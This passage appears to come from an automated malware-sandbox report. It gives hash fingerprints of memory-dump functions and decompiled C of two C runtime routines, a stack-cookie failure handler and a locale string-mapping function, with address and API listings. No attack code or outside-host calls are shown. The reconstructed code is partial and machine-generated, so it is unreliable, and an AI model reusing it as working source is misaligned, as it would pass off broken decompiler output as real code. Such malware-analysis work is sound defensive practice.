                                                                                                                                                  • Opcode ID: 44fec817f2cf23b6c93aba19b0a2865f90796f99353e3a9d5eeb42af03043948
                                                                                                                                                  • Instruction ID: 26de59558f4687203550a44aad094842eb511e4974d2145f68f23f69176163d3
                                                                                                                                                  • Opcode Fuzzy Hash: 44fec817f2cf23b6c93aba19b0a2865f90796f99353e3a9d5eeb42af03043948
                                                                                                                                                  • Instruction Fuzzy Hash: 7F11B176804280CFCB12CF54D9C4B9ABF71FB88324F34C6A9D8044B616C336D45ACBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FBD583, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929681762.0000000001FBD000.00000040.00000001.sdmp, Offset: 01FBD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 44fec817f2cf23b6c93aba19b0a2865f90796f99353e3a9d5eeb42af03043948
                                                                                                                                                  • Instruction ID: 0d541f901087beecbc8c80bc82371a9f7569b80dd5c859bcb4e19b47a7837593
                                                                                                                                                  • Opcode Fuzzy Hash: 44fec817f2cf23b6c93aba19b0a2865f90796f99353e3a9d5eeb42af03043948
                                                                                                                                                  • Instruction Fuzzy Hash: 9511D3B6804280CFCB12CF54D9C4B56BF72FB84328F24C6A9D8094B617C336D45ACBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FCD0FF, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929767424.0000000001FCD000.00000040.00000001.sdmp, Offset: 01FCD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 20471533e443f189603ef6128450aa1fa77345d6e0a9f4e777587199402a2586
                                                                                                                                                  • Instruction ID: 69a8b39f2f295973ff70984c15b99c9354eec4d86ee1a278abcc409e39c72739
                                                                                                                                                  • Opcode Fuzzy Hash: 20471533e443f189603ef6128450aa1fa77345d6e0a9f4e777587199402a2586
                                                                                                                                                  • Instruction Fuzzy Hash: 3111BE75904280DFEB06CF54CAC4B19BBA1FB84724F24C6AEDC494B656C33AD45ACBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FBD01D, Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929681762.0000000001FBD000.00000040.00000001.sdmp, Offset: 01FBD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b5066d55384450d432dde1e2c2b2a7190f3505310d0985bc24de8c4053a0c34
                                                                                                                                                  • Instruction ID: fd1e48479f7b614eca67118be24522dc5ec6d33d0a472a7ca71d2435cb08f10d
                                                                                                                                                  • Opcode Fuzzy Hash: 6b5066d55384450d432dde1e2c2b2a7190f3505310d0985bc24de8c4053a0c34
                                                                                                                                                  • Instruction Fuzzy Hash: 1101F731908380DAE7104E66CCC0BE6BB98EF452ECF18C459ED0D1B64AC37AD449C6B3
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FBD005, Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929681762.0000000001FBD000.00000040.00000001.sdmp, Offset: 01FBD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4f63d7622dee577092ab04317c155bc1ad2541f7d87a203b28ce7b232e0b0c4c
                                                                                                                                                  • Instruction ID: abe0413945a04bbdf30bb696604ee0e83d513c796b45acbafb305a3c7cc62fac
                                                                                                                                                  • Opcode Fuzzy Hash: 4f63d7622dee577092ab04317c155bc1ad2541f7d87a203b28ce7b232e0b0c4c
                                                                                                                                                  • Instruction Fuzzy Hash: F3012D7140E3C09FD7128B258894A96BFB4AF43264F19C4DBD9888F2A7C2699849C772
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0040CE09, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x2da9911f
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x2da9911f
				_v812 = _t12;
				_t13 =  *0x422238; // 0xd2566ee0
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce0f
                                                                                                                                                  0x0040ce11
                                                                                                                                                  0x0040ce11
                                                                                                                                                  0x00413644
                                                                                                                                                  0x00413649
                                                                                                                                                  0x0041364f
                                                                                                                                                  0x00413655
                                                                                                                                                  0x0041365b
                                                                                                                                                  0x00413661
                                                                                                                                                  0x00413667
                                                                                                                                                  0x0041366e
                                                                                                                                                  0x00413675
                                                                                                                                                  0x0041367c
                                                                                                                                                  0x00413683
                                                                                                                                                  0x0041368a
                                                                                                                                                  0x00413691
                                                                                                                                                  0x00413692
                                                                                                                                                  0x0041369b
                                                                                                                                                  0x004136a3
                                                                                                                                                  0x004136ab
                                                                                                                                                  0x004136b6
                                                                                                                                                  0x004136c0
                                                                                                                                                  0x004136c5
                                                                                                                                                  0x004136ca
                                                                                                                                                  0x004136d4
                                                                                                                                                  0x004136de
                                                                                                                                                  0x004136e3
                                                                                                                                                  0x004136e9
                                                                                                                                                  0x004136ee
                                                                                                                                                  0x004136fa
                                                                                                                                                  0x004136ff
                                                                                                                                                  0x00413701
                                                                                                                                                  0x00413709
                                                                                                                                                  0x00413714
                                                                                                                                                  0x00413721
                                                                                                                                                  0x00413723
                                                                                                                                                  0x00413725
                                                                                                                                                  0x0041372a
                                                                                                                                                  0x0041373e

                                                                                                                                                  APIs
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                  • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                  • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                  • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                  • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00417081, Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x2da9911f
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                                                                  0x00417089
                                                                                                                                                  0x00417090
                                                                                                                                                  0x00417098
                                                                                                                                                  0x0041709a
                                                                                                                                                  0x004170a0
                                                                                                                                                  0x004170a6
                                                                                                                                                  0x004170bb
                                                                                                                                                  0x004170c5
                                                                                                                                                  0x004170cb
                                                                                                                                                  0x004170ce
                                                                                                                                                  0x004170d0
                                                                                                                                                  0x004170d0
                                                                                                                                                  0x004170bd
                                                                                                                                                  0x004170bd
                                                                                                                                                  0x004170bd
                                                                                                                                                  0x004170bb
                                                                                                                                                  0x004170dd
                                                                                                                                                  0x00417101
                                                                                                                                                  0x00417101
                                                                                                                                                  0x00417109
                                                                                                                                                  0x004172bb
                                                                                                                                                  0x004172be
                                                                                                                                                  0x004172c1
                                                                                                                                                  0x004172c4
                                                                                                                                                  0x004172cb
                                                                                                                                                  0x004172cb
                                                                                                                                                  0x004172ce
                                                                                                                                                  0x004172d1
                                                                                                                                                  0x004172d8
                                                                                                                                                  0x004172d8
                                                                                                                                                  0x004172de
                                                                                                                                                  0x004172e4
                                                                                                                                                  0x004172e7
                                                                                                                                                  0x004172ea
                                                                                                                                                  0x004172f3
                                                                                                                                                  0x004172f6
                                                                                                                                                  0x004173ef
                                                                                                                                                  0x004173f1
                                                                                                                                                  0x004173f1
                                                                                                                                                  0x004173f4
                                                                                                                                                  0x004173f6
                                                                                                                                                  0x004173f9
                                                                                                                                                  0x004173fe
                                                                                                                                                  0x004173ff
                                                                                                                                                  0x00417402
                                                                                                                                                  0x00417404
                                                                                                                                                  0x00417406
                                                                                                                                                  0x00417409
                                                                                                                                                  0x0041740b
                                                                                                                                                  0x0041740c
                                                                                                                                                  0x00417411
                                                                                                                                                  0x00417409
                                                                                                                                                  0x00417412
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417412
                                                                                                                                                  0x00417309
                                                                                                                                                  0x0041730e
                                                                                                                                                  0x00417311
                                                                                                                                                  0x00417314
                                                                                                                                                  0x00417316
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041732a
                                                                                                                                                  0x0041732c
                                                                                                                                                  0x0041732f
                                                                                                                                                  0x00417331
                                                                                                                                                  0x0041733a
                                                                                                                                                  0x00417379
                                                                                                                                                  0x00417379
                                                                                                                                                  0x00417379
                                                                                                                                                  0x0041737b
                                                                                                                                                  0x0041737b
                                                                                                                                                  0x0041737d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417384
                                                                                                                                                  0x0041739c
                                                                                                                                                  0x0041739e
                                                                                                                                                  0x004173a1
                                                                                                                                                  0x004173a3
                                                                                                                                                  0x004173bf
                                                                                                                                                  0x004173c1
                                                                                                                                                  0x004173c9
                                                                                                                                                  0x004173cb
                                                                                                                                                  0x004173cb
                                                                                                                                                  0x004173a5
                                                                                                                                                  0x004173a5
                                                                                                                                                  0x004173a5
                                                                                                                                                  0x004173cf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004173d4
                                                                                                                                                  0x0041733c
                                                                                                                                                  0x0041733f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417341
                                                                                                                                                  0x00417344
                                                                                                                                                  0x00417349
                                                                                                                                                  0x00417362
                                                                                                                                                  0x00417368
                                                                                                                                                  0x0041736a
                                                                                                                                                  0x0041736c
                                                                                                                                                  0x00417372
                                                                                                                                                  0x00417372
                                                                                                                                                  0x00417372
                                                                                                                                                  0x00417375
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417375
                                                                                                                                                  0x0041734b
                                                                                                                                                  0x00417350
                                                                                                                                                  0x00417352
                                                                                                                                                  0x00417354
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417356
                                                                                                                                                  0x0041735c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041735c
                                                                                                                                                  0x00417333
                                                                                                                                                  0x00417333
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417117
                                                                                                                                                  0x0041711a
                                                                                                                                                  0x004172ec
                                                                                                                                                  0x004172ec
                                                                                                                                                  0x00417414
                                                                                                                                                  0x00417425
                                                                                                                                                  0x00417425
                                                                                                                                                  0x00417120
                                                                                                                                                  0x00417126
                                                                                                                                                  0x0041712d
                                                                                                                                                  0x0041712d
                                                                                                                                                  0x00417130
                                                                                                                                                  0x00417153
                                                                                                                                                  0x00417155
                                                                                                                                                  0x00417157
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041715d
                                                                                                                                                  0x0041715d
                                                                                                                                                  0x004171a2
                                                                                                                                                  0x004171a2
                                                                                                                                                  0x004171a5
                                                                                                                                                  0x004171a8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004171c1
                                                                                                                                                  0x004172aa
                                                                                                                                                  0x004172ad
                                                                                                                                                  0x004172b2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004172b5
                                                                                                                                                  0x004171c7
                                                                                                                                                  0x004171db
                                                                                                                                                  0x004171dd
                                                                                                                                                  0x004171e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004171ef
                                                                                                                                                  0x0041721a
                                                                                                                                                  0x0041721c
                                                                                                                                                  0x00417263
                                                                                                                                                  0x00417263
                                                                                                                                                  0x00417263
                                                                                                                                                  0x00417265
                                                                                                                                                  0x00417265
                                                                                                                                                  0x00417267
                                                                                                                                                  0x00417277
                                                                                                                                                  0x0041727d
                                                                                                                                                  0x0041727f
                                                                                                                                                  0x00417281
                                                                                                                                                  0x00417282
                                                                                                                                                  0x00417283
                                                                                                                                                  0x00417286
                                                                                                                                                  0x0041728c
                                                                                                                                                  0x0041728f
                                                                                                                                                  0x00417288
                                                                                                                                                  0x00417288
                                                                                                                                                  0x00417289
                                                                                                                                                  0x00417289
                                                                                                                                                  0x004172a0
                                                                                                                                                  0x004172a0
                                                                                                                                                  0x004172a4
                                                                                                                                                  0x004172a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417267
                                                                                                                                                  0x00417222
                                                                                                                                                  0x00417223
                                                                                                                                                  0x00417225
                                                                                                                                                  0x00417228
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041722a
                                                                                                                                                  0x0041722a
                                                                                                                                                  0x0041722e
                                                                                                                                                  0x00417233
                                                                                                                                                  0x0041724c
                                                                                                                                                  0x00417252
                                                                                                                                                  0x00417254
                                                                                                                                                  0x00417256
                                                                                                                                                  0x0041725c
                                                                                                                                                  0x0041725c
                                                                                                                                                  0x0041725c
                                                                                                                                                  0x0041725f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041725f
                                                                                                                                                  0x00417235
                                                                                                                                                  0x0041723a
                                                                                                                                                  0x0041723c
                                                                                                                                                  0x0041723e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417240
                                                                                                                                                  0x00417246
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417246
                                                                                                                                                  0x004171f4
                                                                                                                                                  0x00417213
                                                                                                                                                  0x00417213
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004171f4
                                                                                                                                                  0x00417163
                                                                                                                                                  0x00417164
                                                                                                                                                  0x00417169
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041716b
                                                                                                                                                  0x0041716b
                                                                                                                                                  0x00417174
                                                                                                                                                  0x0041718a
                                                                                                                                                  0x00417190
                                                                                                                                                  0x00417192
                                                                                                                                                  0x0041719d
                                                                                                                                                  0x0041719d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041719d
                                                                                                                                                  0x00417194
                                                                                                                                                  0x0041719a
                                                                                                                                                  0x0041719a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041719a
                                                                                                                                                  0x00417176
                                                                                                                                                  0x0041717b
                                                                                                                                                  0x0041717f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417181
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417181
                                                                                                                                                  0x00417157
                                                                                                                                                  0x00417109
                                                                                                                                                  0x004170df
                                                                                                                                                  0x004170e2
                                                                                                                                                  0x004170e5
                                                                                                                                                  0x004170e5
                                                                                                                                                  0x004170e8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004170ea
                                                                                                                                                  0x004170ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004170ef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004170ef
                                                                                                                                                  0x004170f7
                                                                                                                                                  0x004170fb
                                                                                                                                                  0x004170fd
                                                                                                                                                  0x004170fd
                                                                                                                                                  0x004170fe
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,01FF18D8), ref: 004170C5
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                  • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                  • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                  • __freea.LIBCMT ref: 004172A4
                                                                                                                                                  • __freea.LIBCMT ref: 004172AD
                                                                                                                                                  • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                  • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                  • _malloc.LIBCMT ref: 00417362
                                                                                                                                                  • _memset.LIBCMT ref: 00417384
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                  • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                  • __freea.LIBCMT ref: 004173CF
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3809854901-0
